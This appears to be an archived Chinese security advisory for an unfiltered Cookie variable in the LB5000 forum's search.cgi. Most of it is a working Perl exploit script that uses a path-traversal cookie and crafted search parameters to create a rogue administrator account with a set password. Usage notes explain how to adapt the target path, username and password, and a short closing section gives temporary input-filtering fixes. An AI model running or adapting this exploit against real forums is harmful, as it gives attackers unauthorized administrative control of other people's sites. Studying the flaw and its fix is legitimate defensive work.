LB5000 存在Cookie 变量未过滤漏洞的LB5K攻击程序lb5k.pl以及临时解决办法

/ns/ld/softld/data/20011103002303.htm

#!/usr/bin/perl
#Proof of Concept
#LB5K search.cgi exploit
#Codz by analysist <analysist@nsfocus.com>

use Socket;

$ARGC = @ARGV;
if ($ARGC != 2) {
print "Usage: $0 <host> <port>\n";
exit(1);
}

$host = shift;
$port = shift;

#you may need to change it?
$user = "admin";

$req = "GET /LB5000/cgi-bin/search.cgi?action=startsearch&CUR_TIME=$user%5fsch%09c40p%09member%09ad&SEARCH_STRING=i&NAME_SEARCH=really&TYPE_OF_SEARCH=love&POST_SEARCH=analysist&FORUMS_TO_SEARCH=:) HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept: */*\r\n".
"Cookie: amembernamecookie=../members/$user\n\n";

@res = sendraw($req);

if ($res[0] =~ /HTTP\/1\.1 200 OK/ig) {
print "Ok,创建管理员帐号".$user."_sch成功!\n";
}

#modified from rfp's script!:)
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
路径设置可参考LB论坛服务器的路径修改
GET /LB5000/cgi-bin/search.cgi?
注册名字admin也可以修改
$user = "admin";
密码c40p也可以修改
09c40p%09member%
在WINDOWS下安装PERL解释器
先注册一个名字在IE里面留下COOKIE,以便用PL脚本执行攻击



临时解决办法:
1.1.Cookie的问题临时解决办法
可以在第60行$filename = $inmembername;之前,加下下面两行
$inmembername =~ s/\///g;
$inmembername =~ s/\.\.//g;
2.建议对写入文件的变量进行过滤
3.暂停使用search.cgi (删除或者把属性改为666)